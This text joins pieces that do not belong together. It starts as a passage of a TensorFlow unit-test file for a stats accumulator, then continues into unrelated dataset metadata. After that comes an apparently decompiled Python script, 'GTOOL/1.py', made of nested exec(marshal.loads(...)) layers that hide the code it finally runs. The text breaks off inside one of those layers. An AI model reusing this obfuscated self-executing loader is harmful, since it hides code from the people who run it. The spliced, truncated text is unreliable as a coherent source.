num_updates_2, partition_2, feature_2, grads_2, hessians_2 = (
accumulator.flush(stamp_token=0, next_stamp_token=1))
(stamp_token, num_updates_1, partition_1, feature_1, grads_1,
hessians_1, num_updates_2, partition_2, feature_2, grads_2,
hessians_2) = sess.run([
stamp_token, num_updates_1, partition_1, feature_1, grads_1,
hessians_1, num_updates_2, partition_2, feature_2, grads_2,
hessians_2
])
result_1 = _AccumulatorResultToDict(partition_1, feature_1, grads_1,
hessians_1)
result_2 = _AccumulatorResultToDict(partition_2, feature_2, grads_2,
hessians_2)
self.assertEqual(num_updates_1, 1)
self.assertEqual(num_updates_2, 1)
self.assertEqual(len(result_1), 2)
self.assertAllClose(result_1[(1, 2, 0)][0], [0.1, 0.1])
self.assertAllClose(result_1[(1, 2, 0)][1], [[0.01, 0.02], [0.03, 0.04]])
self.assertAllClose(result_1[(2, 3, 0)][0], [0.2, 0.2])
self.assertAllClose(result_1[(2, 3, 0)][1], [[0.05, 0.06], [0.07, 0.08]])
self.assertAllEqual(result_1[1, 2, 0][0], result_2[1, 2, 0][0])
self.assertAllEqual(result_1[1, 2, 0][1], result_2[1, 2, 0][1])
self.assertAllEqual(result_1[2, 3, 0][0], result_2[2, 3, 0][0])
self.assertAllEqual(result_1[2, 3, 0][1], result_2[2, 3, 0][1])
def testDeserialize(self):
with self.cached_session() as sess:
accumulator = stats_accumulator_ops.StatsAccumulator(
stamp_token=0,
gradient_shape=tensor_shape.TensorShape([2]),
hessian_shape=tensor_shape.TensorShape([2, 2]))
with ops.control_dependencies([accumulator.initializer]):
# These will be deleted due to deserialize call.
op1 = accumulator.add(
stamp_token=0,
partition_ids=[1, 2],
feature_ids=[[2, 0], [3, 0]],
# Two values for gradients,
gradients=[[0.1, 0.1], [0.2, 0.2]],
# A 2x2 matrix for each hessian.
hessians=[[[0.01, 0.02], [0.03, 0.04]], [[0.05, 0.06], [0.07,
0.08]]])
with ops.control_dependencies([op1]):
deserialize = accumulator.saveable.deserialize(
stamp_token=2,
num_updates=3,
partition_ids=[3, 4],
feature_ids=[[4, 0], [5, 0]],
# Two values for gradients,
gradients=[[0.3, 0.3], [0.5, 0.5]],
# A 2x2 matrix for each hessian.
hessians=[[[0.03, 0.04], [0.05, 0.06]], [[0.07, 0.08], [0.09,
0.10]]])
with ops.control_dependencies([deserialize]):
num_updates, partition, feature, grads, hessians = accumulator.flush(
stamp_token=2, next_stamp_token=3)
num_updates, partition, feature, grads, hessians = sess.run(
[num_updates, partition, feature, grads, hessians])
result = _AccumulatorResultToDict(partition, feature, grads,
hessians)
self.assertEqual(num_updates, 3)
self.assertEqual(len(result), 2)
self.assertAllClose(result[(3, 4, 0)][0], [0.3, 0.3])
self.assertAllClose(result[(3, 4, 0)][1], [[0.03, 0.04], [0.05, 0.06]])
self.assertAllClose(result[(4, 5, 0)][0], [0.5, 0.5])
self.assertAllClose(result[(4, 5, 0)][1], [[0.07, 0.08], [0.09, 0.10]])
def testMakeSummary(self):
with self.cached_session() as sess:
accumulator = stats_accumulator_ops.StatsAccumulator(
stamp_token=0,
gradient_shape=tensor_shape.TensorShape([2]),
hessian_shape=tensor_shape.TensorShape([2, 2]))
partition, feature, grads, hessians = accumulator._make_summary(
partition_ids=[1, 2, 1],
feature_ids=[[2, 0], [3, 2], [2, 0]],
# Two values for gradients,
gradients=[[0.1, 0.1], [0.2, 0.2], [0.10, 0.11]],
# A 2x2 matrix for each hessian.
hessians=[[[0.01, 0.02], [0.03, 0.04]], [[0.05, 0.06], [0.07, 0.08]],
[[0.011, 0.022], [0.033, 0.044]]])
partition, feature, grads, hessians = sess.run(
[partition, feature, grads, hessians])
result = _AccumulatorResultToDict(partition, feature, grads, hessians)
self.assertEqual(len(result), 2)
self.assertAllClose(result[(1, 2, 0)][0], [0.20, 0.21])
self.assertAllClose(result[(1, 2, 0)][1],
[[0.021, 0.042], [0.063, 0.084]])
self.assertAllClose(result[(2, 3, 2)][0], [0.2, 0.2])
self.assertAllClose(result[(2, 3, 2)][1], [[0.05, 0.06], [0.07, 0.08]])
def _AccumulatorResultToDict(partition, feature, grads, hessians):
"""Converts the inputs to a dictionary since the ordering changes."""
return {(partition[i], feature[i, 0], feature[i, 1]): (grads[i], hessians[i])
for i in range(len(partition))}
if __name__ == "__main__":
googletest.main()
| 45.292842 | 80 | 0.591284 | 2,626 | 20,880 | 4.543412 | 0.076923 | 0.047775 | 0.074428 | 0.080211 | 0.903948 | 0.884503 | 0.867237 | 0.854413 | 0.846283 | 0.837398 | 0 | 0.076928 | 0.264751 | 20,880 | 460 | 81 | 45.391304 | 0.700235 | 0.075766 | 0 | 0.779841 | 0 | 0 | 0.000416 | 0 | 0 | 0 | 0 | 0 | 0.177719 | 1 | 0.034483 | false | 0 | 0.02122 | 0 | 0.06366 | 0.002653 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d21f58903cdf47196ae7db60d29b089b4ae08feb | 136,953 | py | Python | GTOOL/1.py | Alpha-Demon404/RE-14 | b5b46a9f0eee218f2a642b615c77135c33c6f4ad | [
"MIT"
] | 39 | 2020-02-26T09:44:36.000Z | 2022-03-23T00:18:25.000Z | GTOOL/1.py | B4BY-DG/reverse-enginnering | b5b46a9f0eee218f2a642b615c77135c33c6f4ad | [
"MIT"
] | 15 | 2020-05-14T10:07:26.000Z | 2022-01-06T02:55:32.000Z | GTOOL/1.py | B4BY-DG/reverse-enginnering | b5b46a9f0eee218f2a642b615c77135c33c6f4ad | [
"MIT"
] | 41 | 2020-03-16T22:36:38.000Z | 2022-03-17T14:47:19.000Z | # Decompiled At : Jan 16 15:10:57 2020
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.17 (default, Oct 23 2019, 08:25:46) # [GCC 4.2.1 Compatible Android (5220042 based on r346389c) Clang 8.0.7 (https:// # Embedded file name: exec
# Compiled at: 2020-01-01 21:55:11
import marshal,os
try:
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xde\xb8\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsI\xb8\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xb4\xb7\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x1f\xb7\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x8a\xb6\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xf5\xb5\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs`\xb5\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xcb\xb4\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs6\xb4\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xa1\xb3\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x0c\xb3\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsw\xb2\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xe2\xb1\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsM\xb1\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xb8\xb0\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs#\xb0\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x8e\xaf\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xf9\xae\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsd\xae\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xcf\xad\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs:\xad\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xa5\xac\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x10\xac\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs{\xab\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xe6\xaa\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsQ\xaa\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xbc\xa9\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\'\xa9\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x92\xa8\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xfd\xa7\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsh\xa7\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xd3\xa6\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs>\xa6\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xa9\xa5\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x14\xa5\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x7f\xa4\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xea\xa3\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsU\xa3\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xc0\xa2\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs+\xa2\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x96\xa1\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x01\xa1\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsl\xa0\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xd7\x9f\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsB\x9f\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xad\x9e\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x18\x9e\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x83\x9d\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xee\x9c\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsY\x9c\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xc4\x9b\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs/\x9b\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x9a\x9a\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x05\x9a\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsp\x99\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xdb\x98\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsF\x98\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xb1\x97\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x1c\x97\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x87\x96\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xf2\x95\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs]\x95\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xc8\x94\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs3\x94\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x9e\x93\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\t\x93\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNst\x9